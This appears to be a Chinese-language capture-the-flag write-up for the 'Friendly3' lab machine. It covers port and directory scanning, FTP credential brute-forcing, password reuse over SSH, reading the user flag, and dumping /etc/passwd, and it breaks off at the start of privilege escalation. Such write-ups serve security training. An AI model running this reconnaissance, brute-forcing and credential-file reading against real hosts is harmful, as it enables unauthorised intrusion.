![\"image-20240414173445522\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141830124.png\")
<\/div>\n
![\"image-20240414173430381\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141830126.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nrustscan -a 172.20.10.5 -- -A<\/code><\/pre>\nOpen 172.20.10.5:21\nOpen 172.20.10.5:22\nOpen 172.20.10.5:80\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.3\n22\/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n| 256 bc:46:3d:85:18:bf:c7:bb:14:26:9a:20:6c:d3:39:52 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFC2DVBfq6sqSsCS9Jg+TZN7bqZ4U5G\/tKb5dD3M69VVHwPRuMmify8CmxFhlP33nMhZTvYSZIpjGuiPSjks5UA=\n| 256 7b:13:5a:46:a5:62:33:09:24:9d:3e:67:b6:eb:3f:a1 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICDxFT3mwConXgCXORTtuda6Onx3sMQgZb6CzY2tWc3l\n80\/tcp open http syn-ack nginx 1.22.1\n|_http-title: Welcome to nginx!\n|_http-server-header: nginx\/1.22.1\n| http-methods: \n|_ Supported Methods: GET HEAD\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -u http:\/\/172.20.10.5 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n\u6ca1\u6709\u626b\u5230\u4e1c\u897f\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\nHi, sysadmin\nI want you to know that I've just uploaded the new files into the FTP Server.\nSee you,\njuan.<\/code><\/pre>\n\u7206\u7834FTP<\/h3>\n
\u67e5\u770b\u4e00\u4e0bFTP\uff0c\u5c1d\u8bd5\u533f\u540d\u767b\u5f55\uff0c\u6211\u5c1d\u8bd5\u4e86\u4e00\u4e0b\u540d\u5b57\uff1a<\/p>\n
admin\nroot\nftp\nanonymous\njuan\nsysadmin\njuan.<\/code><\/pre>\n\u90fd\u4e0d\u884c\uff0c\u5c1d\u8bd5\u7206\u7834juan\u548csysadmin<\/code>\uff1a<\/p>\n![\"image-20240414180140784\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u5f97\u5230\u7528\u6237<\/p>\n
juan\nalexis<\/code><\/pre>\n\u67e5\u770b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly3]\n\u2514\u2500$ ftp 172.20.10.5 \nConnected to 172.20.10.5.\n220 (vsFTPd 3.0.3)\nName (172.20.10.5:kali): juan\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> pwd\nRemote directory: \/\nftp> ls -la\n229 Entering Extended Passive Mode (|||51316|)\n150 Here comes the directory listing.\ndrwxr-xr-x 14 0 0 4096 Jun 25 2023 .\ndrwxr-xr-x 14 0 0 4096 Jun 25 2023 ..\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file1\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file10\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file100\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file11\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file12\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file13\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file14\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file15\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file16\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file17\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file18\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file19\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file2\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file20\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file21\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file22\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file23\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file24\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file25\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file26\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file27\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file28\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file29\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file3\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file30\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file31\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file32\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file33\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file34\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file35\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file36\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file37\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file38\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file39\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file4\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file40\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file41\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file42\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file43\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file44\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file45\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file46\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file47\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file48\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file49\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file5\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file50\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file51\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file52\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file53\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file54\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file55\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file56\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file57\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file58\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file59\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file6\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file60\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file61\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file62\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file63\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file64\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file65\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file66\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file67\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file68\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file69\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file7\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file70\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file71\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file72\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file73\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file74\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file75\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file76\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file77\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file78\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file79\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file8\n-rw-r--r-- 1 0 0 36 Jun 25 2023 file80\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file81\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file82\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file83\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file84\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file85\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file86\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file87\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file88\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file89\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file9\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file90\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file91\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file92\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file93\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file94\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file95\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file96\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file97\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file98\n-rw-r--r-- 1 0 0 0 Jun 25 2023 file99\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold10\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold11\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold12\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold13\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold14\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold15\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold4\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold5\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold6\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold7\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold8\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 fold9\n-rw-r--r-- 1 0 0 58 Jun 25 2023 fole32\n226 Directory send OK.\nftp> get file80\nlocal: file80 remote: file80\n229 Entering Extended Passive Mode (|||21632|)\n150 Opening BINARY mode data connection for file80 (36 bytes).\n100% |***********************************************************************************************************| 36 0.39 KiB\/s 00:00 ETA\n226 Transfer complete.\n36 bytes received in 00:00 (0.38 KiB\/s)\nftp> get fole32\nlocal: fole32 remote: fole32\n229 Entering Extended Passive Mode (|||14269|)\n150 Opening BINARY mode data connection for fole32 (58 bytes).\n100% |***********************************************************************************************************| 58 92.09 KiB\/s 00:00 ETA\n226 Transfer complete.\n58 bytes received in 00:00 (55.15 KiB\/s)\nftp> get fold10\nlocal: fold10 remote: fold10\n229 Entering Extended Passive Mode (|||46237|)\n550 Failed to open file.\nftp> cd fold10\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||38694|)\n150 Here comes the directory listing.\ndrwxr-xr-x 2 0 0 4096 Jun 25 2023 .\ndrwxr-xr-x 14 0 0 4096 Jun 25 2023 ..\n-rw-r--r-- 1 0 0 163 Jun 25 2023 .test.txt\n226 Directory send OK.\nftp> get .test.txt\nlocal: .test.txt remote: .test.txt\n229 Entering Extended Passive Mode (|||45645|)\n150 Opening BINARY mode data connection for .test.txt (163 bytes).\n100% |***********************************************************************************************************| 163 1.78 KiB\/s 00:00 ETA\n226 Transfer complete.\n163 bytes received in 00:00 (1.77 KiB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly3]\n\u2514\u2500$ cat file80 \nHi, I'm the sysadmin. I am bored...\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly3]\n\u2514\u2500$ cat fole32 \naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabba\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly3]\n\u2514\u2500$ cat .test.txt \nHi, I'am juan another time. I want you to know that I found "cookie" in a file called "zlcnffjbeq.gkg" into my home folder. I think it's from another user, IDK...<\/code><\/pre>\n\u4ec0\u4e48\u73a9\u610f\uff1f\u6682\u65f6\u6ca1\u5565\u7528\u4e86\uff0c\u770b\u6765\u662f\uff0c\u5c1d\u8bd5ssh\u7206\u7834\uff0c\u987a\u4fbf\u8bd5\u4e00\u4e0b\u662f\u5426\u662f\u76f8\u540c\u5bc6\u7801\uff1a<\/p>\n
<\/div><\/p>\n\u770b\u6765\u4e0d\u7528\u7206\u7834\u4e86\uff0c\u4f46\u662f\u8fd8\u662f\u8ba9\u4ed6\u5728\u540e\u9762\u8dd1\u5427\uff0c\u7b49\u4e0b\uff0c\u51fa\u6765\u8fa3\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\njuan@friendly3:~$ ls -la\ntotal 28\ndrwxr-xr-x 3 juan juan 4096 Jul 17 2023 .\ndrwxr-xr-x 4 root root 4096 Jun 25 2023 ..\nlrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 juan juan 220 Apr 23 2023 .bash_logout\n-rw-r--r-- 1 juan juan 3526 Apr 23 2023 .bashrc\ndrwxr-xr-x 14 root root 4096 Jun 25 2023 ftp\n-rw-r--r-- 1 juan juan 807 Apr 23 2023 .profile\n-r-------- 1 juan juan 33 Jul 17 2023 user.txt\njuan@friendly3:~$ cat user.txt \ncb40b159c8086733d57280de3f97de30\njuan@friendly3:~$ find . -name zlcnffjbeq.gkg 2>\/dev\/null\njuan@friendly3:~$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nftp:x:100:108:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\njuan:x:1001:1001::\/home\/juan:\/bin\/bash\nmessagebus:x:101:109::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nblue:x:1002:1002::\/home\/blue:\/bin\/bash\njuan@friendly3:~$ cd ..\njuan@friendly3:\/home$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Jun 25 2023 .\ndrwxr-xr-x 18 root root 4096 Jun 25 2023 ..\ndrwxr-xr-x 2 blue blue 4096 Jun 25 2023 blue\ndrwxr-xr-x 3 juan juan 4096 Jul 17 2023 juan\njuan@friendly3:\/home$ cd blue\njuan@friendly3:\/home\/blue$ ls -la\ntotal 20\ndrwxr-xr-x 2 blue blue 4096 Jun 25 2023 .\ndrwxr-xr-x 4 root root 4096 Jun 25 2023 ..\nlrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 blue blue 220 Apr 23 2023 .bash_logout\n-rw-r--r-- 1 blue blue 3526 Apr 23 2023 .bashrc\n-rw-r--r-- 1 blue blue 807 Apr 23 2023 .profile\njuan@friendly3:\/home\/blue$ find \/ -name zlcnffjbeq.gkg 2>\/dev\/null\njuan@friendly3:\/home\/blue$ find \/ -user blue -name *.txt 2>\/dev\/null\njuan@friendly3:\/home\/blue$ find \/ -user juan -name *.txt 2>\/dev\/null\n\/home\/juan\/user.txt\njuan@friendly3:\/home\/blue$ find \/ -user root -name *.txt 2>\/dev\/null\n\/home\/juan\/ftp\/fold8\/passwd.txt\n\/home\/juan\/ftp\/fold10\/.test.txt\n\/home\/juan\/ftp\/fold5\/yt.txt\n\/var\/cache\/dictionaries-common\/ispell-dicts-list.txt\n\/usr\/share\/vim\/vim90\/doc\/help.txt\n\/usr\/share\/doc\/publicsuffix\/examples\/test_psl.txt\n\/usr\/share\/doc\/openssl\/fingerprints.txt\n\/usr\/share\/doc\/openssl\/HOWTO\/keys.txt\n\/usr\/share\/doc\/vsftpd\/examples\/VIRTUAL_USERS\/logins.txt\n\/usr\/share\/doc\/libdb5.3\/build_signature_amd64.txt\n\/usr\/share\/doc\/mount\/mount.txt\n\/usr\/share\/doc\/util-linux\/howto-debug.txt\n\/usr\/share\/doc\/util-linux\/release-schedule.txt\n\/usr\/share\/doc\/util-linux\/howto-man-page.txt\n\/usr\/share\/doc\/util-linux\/col.txt\n\/usr\/share\/doc\/util-linux\/pg.txt\n\/usr\/share\/doc\/util-linux\/howto-tests.txt\n\/usr\/share\/doc\/util-linux\/getopt.txt\n\/usr\/share\/doc\/util-linux\/getopt_changelog.txt\n\/usr\/share\/doc\/util-linux\/cal.txt\n\/usr\/share\/doc\/util-linux\/hwclock.txt\n\/usr\/share\/doc\/util-linux\/howto-build-sys.txt\n\/usr\/share\/doc\/util-linux\/PAM-configuration.txt\n\/usr\/share\/doc\/util-linux\/howto-compilation.txt\n\/usr\/share\/doc\/util-linux\/mount.txt\n\/usr\/share\/doc\/util-linux\/deprecated.txt\n\/usr\/share\/doc\/util-linux\/modems-with-agetty.txt\n\/usr\/share\/doc\/util-linux\/blkid.txt\n\/usr\/share\/doc\/util-linux\/00-about-docs.txt\n\/usr\/share\/doc\/busybox\/syslog.conf.txt\njuan@friendly3:\/home\/blue$ cat \/home\/juan\/ftp\/fold8\/passwd.txt\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u287f\u281f\u281b\u281b\u281b\u280b\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2819\u281b\u281b\u281b\u283f\u283b\u283f\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u287f\u280b\u2800\u2800\u2800\u2800\u2800\u2840\u2820\u2824\u2812\u2882\u28c9\u28c9\u28c9\u28d1\u28d2\u28d2\u2812\u2812\u2812\u2812\u2812\u2812\u2812\u2800\u2800\u2810\u2812\u281a\u283b\u283f\u283f\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u280f\u2800\u2800\u2800\u2800\u2860\u2814\u2809\u28c0\u2814\u2812\u2809\u28c0\u28c0\u2800\u2800\u2800\u28c0\u2840\u2808\u2809\u2811\u2812\u2812\u2812\u2812\u2812\u2808\u2809\u2809\u2809\u2801\u2802\u2800\u2808\u2819\u28bf\u28ff\u28ff\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u2807\u2800\u2800\u2800\u2814\u2801\u2820\u2816\u2821\u2814\u280a\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2810\u2844\u2800\u2800\u2800\u2800\u2800\u2800\u2844\u2800\u2800\u2800\u2800\u2809\u2832\u2884\u2800\u2800\u2800\u2808\u28ff\u28ff\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u280b\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u280a\u2800\u2880\u28c0\u28e4\u28e4\u28e4\u28e4\u28c0\u2800\u2800\u2800\u28b8\u2800\u2800\u2800\u2800\u2800\u281c\u2800\u2800\u2800\u2800\u28c0\u2840\u2800\u2808\u2803\u2800\u2800\u2800\u2838\u28ff\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u287f\u2825\u2810\u2802\u2800\u2800\u2800\u2800\u2844\u2800\u2830\u28ba\u28ff\u28ff\u28ff\u28ff\u28ff\u28df\u2800\u2808\u2810\u28a4\u2800\u2800\u2800\u2800\u2800\u2800\u2880\u28e0\u28f6\u28fe\u28ef\u2800\u2800\u2809\u2802\u2800\u2820\u2824\u2884\u28c0\u2819\u28bf\u28ff\u28ff\n\u28ff\u287f\u280b\u2821\u2810\u2808\u28c9\u282d\u2824\u2824\u2884\u2840\u2808\u2800\u2808\u2801\u2809\u2801\u2860\u2800\u2800\u2800\u2809\u2810\u2820\u2814\u2800\u2800\u2800\u2800\u2800\u2832\u28ff\u283f\u281b\u281b\u2813\u2812\u2802\u2800\u2800\u2800\u2800\u2800\u2800\u2820\u2849\u28a2\u2819\u28ff\n\u28ff\u2800\u2880\u2801\u2800\u280a\u2800\u2800\u2800\u2800\u2800\u2808\u2801\u2812\u2802\u2800\u2812\u280a\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2847\u2800\u2800\u2800\u2800\u2800\u2880\u28c0\u2860\u2814\u2812\u2812\u2802\u2800\u2808\u2800\u2847\u28ff\n\u28ff\u2800\u28b8\u2800\u2800\u2800\u2880\u28c0\u2860\u280b\u2813\u2824\u28c0\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2804\u2800\u2800\u2800\u2800\u2800\u2800\u2808\u2822\u2824\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u28a0\u2800\u2800\u2800\u2860\u2800\u2847\u28ff\n\u28ff\u2840\u2818\u2800\u2800\u2800\u2800\u2800\u2818\u2844\u2800\u2800\u2800\u2808\u2811\u2866\u2884\u28c0\u2800\u2800\u2810\u2812\u2801\u28b8\u2800\u2800\u2820\u2812\u2804\u2800\u2800\u2800\u2800\u2800\u2880\u2807\u2800\u28c0\u2840\u2800\u2800\u2880\u28be\u2846\u2800\u2808\u2840\u280e\u28f8\u28ff\n\u28ff\u28ff\u28c4\u2848\u2822\u2800\u2800\u2800\u2800\u2818\u28f6\u28c4\u2840\u2800\u2800\u2847\u2800\u2800\u2808\u2809\u2812\u2822\u2864\u28c0\u2840\u2800\u2800\u2800\u2800\u2800\u2810\u2826\u2824\u2812\u2801\u2800\u2800\u2800\u2800\u28c0\u28b4\u2801\u2800\u28b7\u2800\u2800\u2800\u28b0\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28c7\u2802\u2800\u2800\u2800\u2800\u2808\u2882\u2800\u2808\u2839\u2867\u28c0\u2800\u2800\u2800\u2800\u2800\u2847\u2800\u2800\u2809\u2809\u2809\u28b1\u2812\u2812\u2812\u2812\u2896\u2812\u2812\u2802\u2819\u280f\u2800\u2818\u2840\u2800\u28b8\u2800\u2800\u2800\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28e7\u2800\u2800\u2800\u2800\u2800\u2800\u2811\u2804\u2830\u2800\u2800\u2801\u2810\u2832\u28e4\u28f4\u28c4\u2840\u2800\u2800\u2800\u2800\u28b8\u2800\u2800\u2800\u2800\u28b8\u2800\u2800\u2800\u2800\u28a0\u2800\u28e0\u28f7\u28f6\u28ff\u2800\u2800\u28b0\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28e7\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2801\u2880\u2800\u2800\u2800\u2800\u2800\u2859\u280b\u2819\u2813\u2832\u28a4\u28e4\u28f7\u28e4\u28e4\u28e4\u28e4\u28fe\u28e6\u28e4\u28e4\u28f6\u28ff\u28ff\u28ff\u28ff\u285f\u28b9\u2800\u2800\u28b8\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28e7\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2811\u2800\u2884\u2800\u2870\u2801\u2800\u2800\u2800\u2800\u2800\u2808\u2809\u2801\u2808\u2809\u283b\u280b\u2809\u281b\u289b\u2809\u2809\u28b9\u2801\u2880\u2887\u280e\u2800\u2800\u28b8\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28e6\u28c0\u2808\u2822\u2884\u2849\u2802\u2804\u2840\u2800\u2808\u2812\u2822\u2804\u2800\u2880\u28c0\u28c0\u28f0\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2840\u2800\u2880\u28ce\u2800\u283c\u280a\u2800\u2800\u2800\u2818\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28c4\u2840\u2809\u2822\u2884\u2848\u2811\u2822\u2884\u2840\u2800\u2800\u2800\u2800\u2800\u2800\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2809\u2801\u2800\u2800\u2880\u2800\u2800\u2800\u2800\u2800\u28bb\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28e6\u28c0\u2848\u2811\u2822\u2884\u2840\u2808\u2811\u2812\u2824\u2804\u28c0\u28c0\u2800\u2809\u2809\u2809\u2809\u2800\u2800\u2800\u28c0\u2840\u2824\u2802\u2801\u2800\u2880\u2806\u2800\u2800\u28b8\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28e6\u28c4\u2840\u2801\u2809\u2812\u2802\u2824\u2824\u28c0\u28c0\u28c9\u2849\u2809\u2809\u2809\u2809\u2880\u28c0\u28c0\u2860\u2824\u2812\u2808\u2800\u2800\u2800\u2800\u28f8\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f7\u28f6\u28e4\u28c4\u28c0\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u2800\u28f0\u28ff\u28ff\u28ff\n\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28ff\u28f6\u28f6\u28f6\u28f6\u28e4\u28e4\u28e4\u28e4\u28c0\u28c0\u28e4\u28e4\u28e4\u28f6\u28fe\u28ff\u28ff\u28ff\u28ff\u28ff\njuan@friendly3:\/home\/blue$ cat \/home\/juan\/ftp\/fold5\/yt.txt\nThanks to all my YT subscribers!<\/code><\/pre>\n\u501f\u7740\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
juan@friendly3:\/home\/blue$ sudo -l\n-bash: sudo: command not found\njuan@friendly3:\/home\/blue$ cd \/\njuan@friendly3:\/$ ls -la\ntotal 68\ndrwxr-xr-x 18 root root 4096 Jun 25 2023 .\ndrwxr-xr-x 18 root root 4096 Jun 25 2023 ..\nlrwxrwxrwx 1 root root 7 Jun 25 2023 bin -> usr\/bin\ndrwxr-xr-x 3 root root 4096 Jun 25 2023 boot\ndrwxr-xr-x 17 root root 3300 Apr 14 05:34 dev\ndrwxr-xr-x 63 root root 4096 Apr 14 05:34 etc\ndrwxr-xr-x 4 root root 4096 Jun 25 2023 home\nlrwxrwxrwx 1 root root 29 Jun 25 2023 initrd.img -> boot\/initrd.img-6.1.0-9-amd64\nlrwxrwxrwx 1 root root 29 Jun 25 2023 initrd.img.old -> boot\/initrd.img-6.1.0-9-amd64\nlrwxrwxrwx 1 root root 7 Jun 25 2023 lib -> usr\/lib\nlrwxrwxrwx 1 root root 9 Jun 25 2023 lib32 -> usr\/lib32\nlrwxrwxrwx 